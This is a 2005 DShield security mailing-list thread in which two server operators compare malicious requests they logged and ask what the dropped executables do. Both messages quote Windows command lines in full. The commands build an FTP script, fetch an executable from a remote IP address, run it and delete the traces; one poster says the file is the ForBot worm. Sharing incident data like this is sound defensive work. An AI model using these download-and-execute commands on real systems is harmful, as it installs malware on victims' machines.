[Dshield] Anyone seen wiit.exe?

Gregory Boyce gboyce at badbelly.com
Mon Aug 29 21:41:39 GMT 2005


I was just hit with a similiar type of request:

echo open 24.128.83.224 10051>>o&echo h>>o&echo h>>o&echo get 
cool.exe>>o&echo bye>>o&ftp -n -s:o&cool.exe&del o&exit

I connected to the ftp server and grabbed cool.exe.  Submitting it for 
scanning revealed it is Win32.HLLW.ForBot.

Yours might be a different variant, but you should be able to use the same 
method to figure out what it is.

On Mon, 29 Aug 2005, bgreenwood wrote:

>
>
> Over about the past two weeks or so I have noticed the following being 
> base64 encoded in the URI of some incoming requests to my site...
>
> cmd /k echo open 219.95.165.42 17113 > o&echo user 1 1 >> o &echo get 
> wiit.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &wiit.exe
>
> I have seen this activity before but with different filenames being 
> called out.  I don't recall seeing the wiit.exe or know exactly what it 
> is supposed to be doing. Has anyone seen this or know what it is 
> supposed to be doing once executed?


More information about the list mailing list